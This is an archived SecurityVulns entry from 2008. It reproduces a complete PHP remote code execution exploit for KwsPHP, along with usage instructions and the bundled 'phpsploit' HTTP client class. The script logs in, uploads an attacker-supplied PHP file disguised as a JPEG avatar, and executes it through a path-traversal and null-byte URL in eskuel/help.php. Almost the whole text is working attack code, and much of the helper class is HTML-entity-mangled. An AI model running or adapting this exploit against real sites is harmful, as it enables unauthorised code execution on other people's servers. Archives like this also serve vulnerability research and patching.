KwsPHP (Upload) Remote Code Execution Exploit

2008-04-15T00:00:00
ID SECURITYVULNS:DOC:19661
Type securityvulns
Reporter Securityvulns
Modified 2008-04-15T00:00:00

Description

<?php / ---KwsPHP All Version / Remote Code Execution--- Faille Discovered By TsukasaGenesis && Ajax Sploit Coded By Ajax Site: http://www.r57shell.in / if($argc<9){ print "---KwsPHP All Version / Remote Code Execution---\n\n"; print "usage: kwsphpsploit.php -url <url> -login <login> -pass <pass> -email <email> -file <file> [-id <id>]\n\n"; print "Url url of KwsPHP script : Ex : www.example.com/kwsphp/\n"; print "Login your account's login ( need to be allow to upload )\n"; print "Pass account's password\n"; print "Email account's email\n"; print "File PHP script upload and execute\n"; print "Id account'id\n\n"; exit(); } function getparam($param,$opt='') { global $argv; foreach($argv as $value => $key) { if($key == '-'.$param) return $argv[$value+1]; } if($opt) exit("\n-$param parameter required"); else return; } $url = getparam("url",1); $login = getparam("login",1); $pass = getparam("pass",1); $email = getparam("email",1); $file = getparam("file",1); $id = getparam("id"); $source = @file_get_contents($file); if(strlen($source)<2){ exit("$file don't exist.\n"); }

$xpl = new phpsploit(); $s = $xpl->post($url."/index.php?","sql_pseudo=$login&sql_pass=$pass");

//Cookies

if(preg_match("#Set-Cookie: PHPSESSID=([a-z0-9]+)#i",$s,$phpsessid) && !preg_match("#name=\"sql_pseudo\"#i",$s)){ $xpl->addcookie("PHPSESSID",$phpsessid[1]); $xpl->addcookie("sql_pseudo",$login); $xpl->addcookie("sql_pass",md5($pass)); $xpl->addcookie("auto","off"); print "[] PHPSESSID : $phpsessid[1]\n"; } else{ exit("[] Can't log in\n"); }

//Id if(!isset($id)){ preg_match("#id=([0-9]+)\" title=\"Voir son profil\">".$login."<\/a>#i",$s,$id_member); $id = $id_member[1]; } print "[*] Id : $id\n";

//Upload $formdata = array(frmdt_url => $url.'/index.php?mod=espace_membre&ac=profil', 'action' => 'modifier', 'ok' => '1', 'id' => $id, 'pseudo' => $login, 'sql_newNom' => $login, 'sql_newMail' => $email, 'MAX_FILE_SIZE' => '2097152', 'valider' => ' Modifier mon profil', 'userfile[]' => array( frmdt_type => 'image/jpeg', frmdt_filename => 'test.jpg', frmdt_content => $source)); $xpl->formdata($formdata); print "[] Upload finish.\n"; $url = $url."/eskuel/help.php?action=../../../images/avatars/upload/".$id.".jpg%00"; print "[] Exploit Sucess !\n"; print "[*] The code can be run here : \nhttp://" . $url . "\n";

/ * * Copyright (C) darkfig * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. * * TITLE: PhpSploit Class * REQUIREMENTS: PHP 4 / PHP 5 * VERSION: 2.0 * LICENSE: GNU General Public License * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt * FILENAME: phpsploitclass.php * * CONTACT: gmdarkfig@gmail.com (french / english) * GREETZ: Sparah, Ddx39 * * DESCRIPTION: * The phpsploit is a class implementing a web user agent. * You can add cookies, headers, use a proxy server with (or without) a * basic authentification. It supports the GET and the POST method. It can * also be used like a browser with the cookiejar() function (which allow * a server to add several cookies for the next requests) and the * allowredirection() function (which allow the script to follow all * redirections sent by the server). It can return the content (or the * headers) of the request. Others useful functions can be used for debugging. * A manual is actually in development but to know how to use it, you can * read the comments. * * CHANGELOG: * * [2007-06-10] (2.0) * * Code: Code optimization * * New: Compatible with PHP 4 by default * * [2007-01-24] (1.2) * * Bug #2 fixed: Problem concerning the getcookie() function ((|;)) * * New: multipart/form-data enctype is now supported * * [2006-12-31] (1.1) * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) * * New: You can now call the getheader() / getcontent() function without parameters * * [2006-12-30] (1.0) * * First version * /

class phpsploit { var $proxyhost; var $proxyport; var $host; var $path; var $port; var $method; var $url; var $packet; var $proxyuser; var $proxypass; var $header; var $cookie; var $data; var $boundary; var $allowredirection; var $last_redirection; var $cookiejar; var $recv; var $cookie_str; var $header_str; var $server_content; var $server_header;

    /**
     * This function is called by the
     * get&#40;&#41;/post&#40;&#41;/formdata&#40;&#41; functions.
     * You don&#39;t have to call it, this is
     * the main function.
     *
     * @access private
     * @return string $this-&gt;recv ServerResponse
     * 
     */
    function sock&#40;&#41;
    {
            if&#40;!empty&#40;$this-&gt;proxyhost&#41; &amp;&amp; !empty&#40;$this-&gt;proxyport&#41;&#41;
               $socket = @fsockopen&#40;$this-&gt;proxyhost,$this-&gt;proxyport&#41;;
            else
               $socket = @fsockopen&#40;$this-&gt;host,$this-&gt;port&#41;;

            if&#40;!$socket&#41;
               die&#40;&quot;Error: Host seems down&quot;&#41;;

            if&#40;$this-&gt;method==&#39;get&#39;&#41;
               $this-&gt;packet = &#39;GET &#39;.$this-&gt;url.&quot; HTTP/1.1&#92;r&#92;n&quot;;

            elseif&#40;$this-&gt;method==&#39;post&#39; or $this-&gt;method==&#39;formdata&#39;&#41;
               $this-&gt;packet = &#39;POST &#39;.$this-&gt;url.&quot; HTTP/1.1&#92;r&#92;n&quot;;

            else
               die&#40;&quot;Error: Invalid method&quot;&#41;;

            if&#40;!empty&#40;$this-&gt;proxyuser&#41;&#41;
               $this-&gt;packet .= &#39;Proxy-Authorization: Basic

'.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";

            if&#40;!empty&#40;$this-&gt;header&#41;&#41;
               $this-&gt;packet .= $this-&gt;showheader&#40;&#41;;

            if&#40;!empty&#40;$this-&gt;cookie&#41;&#41;
               $this-&gt;packet .= &#39;Cookie: &#39;.$this-&gt;showcookie&#40;&#41;.&quot;&#92;r&#92;n&quot;;

            $this-&gt;packet .= &#39;Host: &#39;.$this-&gt;host.&quot;&#92;r&#92;n&quot;;
            $this-&gt;packet .= &quot;Connection: Close&#92;r&#92;n&quot;;

            if&#40;$this-&gt;method==&#39;post&#39;&#41;
            {
                    $this-&gt;packet .= &quot;Content-Type: application/x-www-form-urlencoded&#92;r&#92;n&quot;;
                    $this-&gt;packet .= &#39;Content-Length: &#39;.strlen&#40;$this-&gt;data&#41;.&quot;&#92;r&#92;n&#92;r&#92;n&quot;;
                    $this-&gt;packet .= $this-&gt;data.&quot;&#92;r&#92;n&quot;;
            }
            elseif&#40;$this-&gt;method==&#39;formdata&#39;&#41;
            {
                    $this-&gt;packet .= &#39;Content-Type: multipart/form-data;

boundary='.str_repeat('-',27).$this->boundary."\r\n"; $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; $this->packet .= $this->data; }

            $this-&gt;packet .= &quot;&#92;r&#92;n&quot;;
            $this-&gt;recv = &#39;&#39;;

            fputs&#40;$socket,$this-&gt;packet&#41;;

            while&#40;!feof&#40;$socket&#41;&#41;
               $this-&gt;recv .= fgets&#40;$socket&#41;;

            fclose&#40;$socket&#41;;

            if&#40;$this-&gt;cookiejar&#41;
               $this-&gt;getcookie&#40;&#41;;

            if&#40;$this-&gt;allowredirection&#41;
               return $this-&gt;getredirection&#40;&#41;;
            else
               return $this-&gt;recv;
    }


    /**
     * This function allows you to add several
     * cookies in the request.
     * 
     * @access  public
     * @param   string cookn CookieName
     * @param   string cookv CookieValue
     * @example $this-&gt;addcookie&#40;&#39;name&#39;,&#39;value&#39;&#41;
     * 
     */
    function addcookie&#40;$cookn,$cookv&#41;
    {
            if&#40;!isset&#40;$this-&gt;cookie&#41;&#41;
               $this-&gt;cookie = array&#40;&#41;;

            $this-&gt;cookie[$cookn] = $cookv;
    }


    /**
     * This function allows you to add several
     * headers in the request.
     *
     * @access  public
     * @param   string headern HeaderName
     * @param   string headervalue Headervalue
     * @example $this-&gt;addheader&#40;&#39;Client-IP&#39;, &#39;128.5.2.3&#39;&#41;
     * 
     */
    function addheader&#40;$headern,$headervalue&#41;
    {
            if&#40;!isset&#40;$this-&gt;header&#41;&#41;
               $this-&gt;header = array&#40;&#41;;

            $this-&gt;header[$headern] = $headervalue;
    }


    /**
     * This function allows you to use an
     * http proxy server. Several methods
     * are supported.
     * 
     * @access  public
     * @param   string proxy ProxyHost
     * @param   integer proxyp ProxyPort
     * @example $this-&gt;proxy&#40;&#39;localhost&#39;,8118&#41;
     * @example $this-&gt;proxy&#40;&#39;localhost:8118&#39;&#41;
     * 
     */
    function proxy&#40;$proxy,$proxyp=&#39;&#39;&#41;
    {
            if&#40;empty&#40;$proxyp&#41;&#41;
            {
                    $proxarr = explode&#40;&#39;:&#39;,$proxy&#41;;
                    $this-&gt;proxyhost = $proxarr[0];
                    $this-&gt;proxyport = &#40;int&#41;$proxarr[1];
            }
            else 
            {
                    $this-&gt;proxyhost = $proxy;
                    $this-&gt;proxyport = &#40;int&#41;$proxyp;
            }

            if&#40;$this-&gt;proxyport &gt; 65535&#41;
               die&#40;&quot;Error: Invalid port number&quot;&#41;;
    }


    /**
     * This function allows you to use an
     * http proxy server which requires a
     * basic authentification. Several
     * methods are supported:
     *
     * @access  public
     * @param   string proxyauth ProxyUser
     * @param   string proxypass ProxyPass
     * @example $this-&gt;proxyauth&#40;&#39;user&#39;,&#39;pwd&#39;&#41;
     * @example $this-&gt;proxyauth&#40;&#39;user:pwd&#39;&#41;;
     * 
     */
    function proxyauth&#40;$proxyauth,$proxypass=&#39;&#39;&#41;
    {
            if&#40;empty&#40;$proxypass&#41;&#41;
            {
                    $posvirg = strpos&#40;$proxyauth,&#39;:&#39;&#41;;
                    $this-&gt;proxyuser = substr&#40;$proxyauth,0,$posvirg&#41;;
                    $this-&gt;proxypass = substr&#40;$proxyauth,$posvirg+1&#41;;
            }
            else
            {
                    $this-&gt;proxyuser = $proxyauth;
                    $this-&gt;proxypass = $proxypass;
            }
    }


    /**
     * This function allows you to set
     * the &#39;User-Agent&#39; header.
     * 
     * @access  public
     * @param   string useragent Agent
     * @example $this-&gt;agent&#40;&#39;Firefox&#39;&#41;
     * 
     */
    function agent&#40;$useragent&#41;
    {
            $this-&gt;addheader&#40;&#39;User-Agent&#39;,$useragent&#41;;
    }


    /**
     * This function returns the headers
     * which will be in the next request.
     * 
     * @access  public
     * @return  string $this-&gt;header_str Headers
     * @example $this-&gt;showheader&#40;&#41;
     * 
     */
    function showheader&#40;&#41;
    {
            $this-&gt;header_str = &#39;&#39;;

            if&#40;!isset&#40;$this-&gt;header&#41;&#41;
               return;

            foreach&#40;$this-&gt;header as $name =&gt; $value&#41;
               $this-&gt;header_str .= $name.&#39;: &#39;.$value.&quot;&#92;r&#92;n&quot;;

            return $this-&gt;header_str;
    }


    /**
     * This function returns the cookies
     * which will be in the next request.
     * 
     * @access  public
     * @return  string $this-&gt;cookie_str Cookies
     * @example $this-&gt;showcookie&#40;&#41;
     * 
     */
    function showcookie&#40;&#41;
    {
            $this-&gt;cookie_str = &#39;&#39;;

            if&#40;!isset&#40;$this-&gt;cookie&#41;&#41;
               return;

            foreach&#40;$this-&gt;cookie as $name =&gt; $value&#41;
               $this-&gt;cookie_str .= $name.&#39;=&#39;.$value.&#39;; &#39;;

            return $this-&gt;cookie_str;
    }


    /**
     * This function returns the last
     * formed http request.
     * 
     * @access  public
     * @return  string $this-&gt;packet HttpPacket
     * @example $this-&gt;showlastrequest&#40;&#41;
     * 
     */
    function showlastrequest&#40;&#41;
    {
            if&#40;!isset&#40;$this-&gt;packet&#41;&#41;
               return;
            else
               return $this-&gt;packet;
    }


    /**
     * This function sends the formed
     * http packet with the GET method.
     * 
     * @access  public
     * @param   string url Url
     * @return  string $this-&gt;sock&#40;&#41;
     * @example $this-&gt;get&#40;&#39;localhost/index.php?var=x&#39;&#41;
     * @example $this-&gt;get&#40;&#39;http://localhost:88/tst.php&#39;&#41;
     * 
     */
    function get&#40;$url&#41;
    {
            $this-&gt;target&#40;$url&#41;;
            $this-&gt;method = &#39;get&#39;;
            return $this-&gt;sock&#40;&#41;;
    }


    /**
     * This function sends the formed
     * http packet with the POST method.
     *
     * @access  public
     * @param   string url  Url
     * @param   string data PostData
     * @return  string $this-&gt;sock&#40;&#41;
     * @example $this-&gt;post&#40;&#39;http://localhost/&#39;,&#39;helo=x&#39;&#41;
     * 
     */     
    function post&#40;$url,$data&#41;
    {
            $this-&gt;target&#40;$url&#41;;
            $this-&gt;method = &#39;post&#39;;
            $this-&gt;data = $data;
            return $this-&gt;sock&#40;&#41;;
    }


    /**
     * This function sends the formed http
     * packet with the POST method using
     * the multipart/form-data enctype.
     * 
     * @access  public
     * @param   array array FormDataArray
     * @return  string $this-&gt;sock&#40;&#41;
     * @example $formdata = array&#40;
     *                      frmdt_url =&gt; &#39;http://localhost/upload.php&#39;,
     *                      frmdt_boundary =&gt; &#39;123456&#39;, # Optional
     *                      &#39;var&#39; =&gt; &#39;example&#39;,
     *                      &#39;file&#39; =&gt; array&#40;
     *                                frmdt_type =&gt; &#39;image/gif&#39;,  # Optional
     *                                frmdt_transfert =&gt; &#39;binary&#39; # Optional
     *                                frmdt_filename =&gt; &#39;hello.php,
     *                                frmdt_content =&gt; &#39;&lt;?php echo 1; ?&gt;&#39;&#41;&#41;;
     *          $this-&gt;formdata&#40;$formdata&#41;;
     * 
     */
    function formdata&#40;$array&#41;
    {
            $this-&gt;target&#40;$array[frmdt_url]&#41;;
            $this-&gt;method = &#39;formdata&#39;;
            $this-&gt;data = &#39;&#39;;

            if&#40;!isset&#40;$array[frmdt_boundary]&#41;&#41;
               $this-&gt;boundary = &#39;phpsploit&#39;;
            else
               $this-&gt;boundary = $array[frmdt_boundary];

            foreach&#40;$array as $key =&gt; $value&#41;
            {
                    if&#40;!preg_match&#40;&#39;#^frmdt_&#40;boundary|url&#41;#&#39;,$key&#41;&#41;
                    {
                            $this-&gt;data .= str_repeat&#40;&#39;-&#39;,29&#41;.$this-&gt;boundary.&quot;&#92;r&#92;n&quot;;
                            $this-&gt;data .= &#39;Content-Disposition: form-data; name=&quot;&#39;.$key.&#39;&quot;;&#39;;

                            if&#40;!is_array&#40;$value&#41;&#41;
                            {
                                    $this-&gt;data .= &quot;&#92;r&#92;n&#92;r&#92;n&quot;.$value.&quot;&#92;r&#92;n&quot;;
                            }
                            else
                            {
                                    $this-&gt;data .= &#39;

filename="'.$array[$key][frmdt_filename]."\";\r\n";

                                    if&#40;isset&#40;$array[$key][frmdt_type]&#41;&#41;
                                       $this-&gt;data .= &#39;Content-Type:

'.$array[$key][frmdt_type]."\r\n";

                                    if&#40;isset&#40;$array[$key][frmdt_transfert]&#41;&#41;
                                       $this-&gt;data .= &#39;Content-Transfer-Encoding:

'.$array[$key][frmdt_transfert]."\r\n";

                                    $this-&gt;data .= &quot;&#92;r&#92;n&quot;.$array[$key][frmdt_content].&quot;&#92;r&#92;n&quot;;
                            }
                    }
            }

            $this-&gt;data .= str_repeat&#40;&#39;-&#39;,29&#41;.$this-&gt;boundary.&quot;--&#92;r&#92;n&quot;;
            return $this-&gt;sock&#40;&#41;;
    }


    /**
     * This function returns the content
     * of the server response, without
     * the headers.
     * 
     * @access  public
     * @param   string code ServerResponse
     * @return  string $this-&gt;server_content
     * @example $this-&gt;getcontent&#40;&#41;
     * @example $this-&gt;getcontent&#40;$this-&gt;get&#40;&#39;http://localhost/&#39;&#41;&#41;
     * 
     */
    function getcontent&#40;$code=&#39;&#39;&#41;
    {
            if&#40;empty&#40;$code&#41;&#41;
               $code = $this-&gt;recv;

            $code = explode&#40;&quot;&#92;r&#92;n&#92;r&#92;n&quot;,$code&#41;;
            $this-&gt;server_content = &#39;&#39;;

            for&#40;$i=1;$i&lt;count&#40;$code&#41;;$i++&#41;
               $this-&gt;server_content .= $code[$i];

            return $this-&gt;server_content;
    }


    /**
     * This function returns the headers
     * of the server response, without
     * the content.
     * 
     * @access  public
     * @param   string code ServerResponse
     * @return  string $this-&gt;server_header
     * @example $this-&gt;getcontent&#40;&#41;
     * @example $this-&gt;getcontent&#40;$this-&gt;post&#40;&#39;http://localhost/&#39;,&#39;1=2&#39;&#41;&#41;
     * 
     */
    function getheader&#40;$code=&#39;&#39;&#41;
    {
            if&#40;empty&#40;$code&#41;&#41;
               $code = $this-&gt;recv;

            $code = explode&#40;&quot;&#92;r&#92;n&#92;r&#92;n&quot;,$code&#41;;
            $this-&gt;server_header = $code[0];

            return $this-&gt;server_header;
    }


    /**
     * This function is called by the
     * cookiejar&#40;&#41; function. It adds the
     * value of the &quot;Set-Cookie&quot; header
     * in the &quot;Cookie&quot; header for the
     * next request. You don&#39;t have to
     * call it.
     * 
     * @access private
     * @param  string code ServerResponse
     * 
     */
    function getcookie&#40;&#41;
    {
            foreach&#40;explode&#40;&quot;&#92;r&#92;n&quot;,$this-&gt;getheader&#40;&#41;&#41; as $header&#41;
            {
                    if&#40;preg_match&#40;&#39;/set-cookie/i&#39;,$header&#41;&#41;
                    {
                            $fequal = strpos&#40;$header,&#39;=&#39;&#41;;
                            $fvirgu = strpos&#40;$header,&#39;;&#39;&#41;;

                            // 12=strlen&#40;&#39;set-cookie: &#39;&#41;
                            $cname  = substr&#40;$header,12,$fequal-12&#41;;
                            $cvalu  = substr&#40;$header,$fequal+1,$fvirgu-&#40;strlen&#40;$cname&#41;+12+1&#41;&#41;;

                            $this-&gt;cookie[trim&#40;$cname&#41;] = trim&#40;$cvalu&#41;;
                    }
            }
    }


    /**
     * This function is called by the
     * get&#40;&#41;/post&#40;&#41; functions. You
     * don&#39;t have to call it.
     *
     * @access  private
     * @param   string urltarg Url
     * @example $this-&gt;target&#40;&#39;http://localhost/&#39;&#41;
     * 
     */
    function target&#40;$urltarg&#41;
    {
            if&#40;!ereg&#40;&#39;^http://&#39;,$urltarg&#41;&#41;
               $urltarg = &#39;http://&#39;.$urltarg;

            $urlarr     = parse_url&#40;$urltarg&#41;;
            $this-&gt;url  = &#39;http://&#39;.$urlarr[&#39;host&#39;].$urlarr[&#39;path&#39;];

            if&#40;isset&#40;$urlarr[&#39;query&#39;]&#41;&#41;
               $this-&gt;url .= &#39;?&#39;.$urlarr[&#39;query&#39;];

            $this-&gt;port = !empty&#40;$urlarr[&#39;port&#39;]&#41; ? $urlarr[&#39;port&#39;] : 80;
            $this-&gt;host = $urlarr[&#39;host&#39;];

            if&#40;$this-&gt;port != &#39;80&#39;&#41;
               $this-&gt;host .= &#39;:&#39;.$this-&gt;port;

            if&#40;!isset&#40;$urlarr[&#39;path&#39;]&#41; or empty&#40;$urlarr[&#39;path&#39;]&#41;&#41;
               die&#40;&quot;Error: No path precised&quot;&#41;;

            $this-&gt;path = substr&#40;$urlarr[&#39;path&#39;],0,strrpos&#40;$urlarr[&#39;path&#39;],&#39;/&#39;&#41;+1&#41;;

            if&#40;$this-&gt;port &gt; 65535&#41;
               die&#40;&quot;Error: Invalid port number&quot;&#41;;
    }


    /**
     * If you call this function,
     * the script will extract all
     * &#39;Set-Cookie&#39; headers values
     * and it will automatically add
     * them into the &#39;Cookie&#39; header
     * for all next requests.
     *
     * @access  public
     * @param   integer code 1&#40;enabled&#41; 0&#40;disabled&#41;
     * @example $this-&gt;cookiejar&#40;0&#41;
     * @example $this-&gt;cookiejar&#40;1&#41;
     * 
     */
    function cookiejar&#40;$code&#41;
    {
            if&#40;$code==&#39;0&#39;&#41;
               $this-&gt;cookiejar=FALSE;

            elseif&#40;$code==&#39;1&#39;&#41;
               $this-&gt;cookiejar=TRUE;
    }


    /**
     * If you call this function,
     * the script will follow all
     * redirections sent by the server.
     * 
     * @access  public
     * @param   integer code 1&#40;enabled&#41; 0&#40;disabled&#41;
     * @example $this-&gt;allowredirection&#40;0&#41;
     * @example $this-&gt;allowredirection&#40;1&#41;
     * 
     */
    function allowredirection&#40;$code&#41;
    {
            if&#40;$code==&#39;0&#39;&#41;
               $this-&gt;allowredirection=FALSE;

            elseif&#40;$code==&#39;1&#39;&#41;
               $this-&gt;allowredirection=TRUE;
    }


    /**
     * This function is called if
     * allowredirection&#40;&#41; is enabled.
     * You don&#39;t have to call it.
     *
     * @access private
     * @return string $this-&gt;get&#40;&#39;http://&#39;.$this-&gt;host.$this-&gt;path.$this-&gt;last_redirection&#41;
     * @return string $this-&gt;get&#40;$this-&gt;last_redirection&#41;
     * @return string $this-&gt;recv;
     * 
     */
    function getredirection&#40;&#41;
    {
            if&#40;preg_match&#40;&#39;/&#40;location|content-location|uri&#41;: &#40;.*&#41;/i&#39;,$this-&gt;getheader&#40;&#41;,$codearr&#41;&#41;
            {
                    $this-&gt;last_redirection = trim&#40;$codearr[2]&#41;;

                    if&#40;!ereg&#40;&#39;://&#39;,$this-&gt;last_redirection&#41;&#41;
                       return

$this->get('http://'.$this->host.$this->path.$this->last_redirection);

                    else
                       return $this-&gt;get&#40;$this-&gt;last_redirection&#41;;
            }
            else
               return $this-&gt;recv;
    }


    /**
     * This function allows you
     * to reset some parameters.
     * 
     * @access  public
     * @param   string func Param
     * @example $this-&gt;reset&#40;&#39;header&#39;&#41;
     * @example $this-&gt;reset&#40;&#39;cookie&#39;&#41;
     * @example $this-&gt;reset&#40;&#41;
     * 
     */
    function reset&#40;$func=&#39;&#39;&#41;
    {
            switch&#40;$func&#41;
            {
                    case &#39;header&#39;:
                    $this-&gt;header = array&#40;&#41;;
                    break;

                    case &#39;cookie&#39;:
                    $this-&gt;cookie = array&#40;&#41;;
                    break;

                    default:
                    $this-&gt;cookiejar = &#39;&#39;;
                    $this-&gt;header = array&#40;&#41;;
                    $this-&gt;cookie = array&#40;&#41;;
                    $this-&gt;allowredirection = &#39;&#39;;
                    break;
            }
    }

} ?>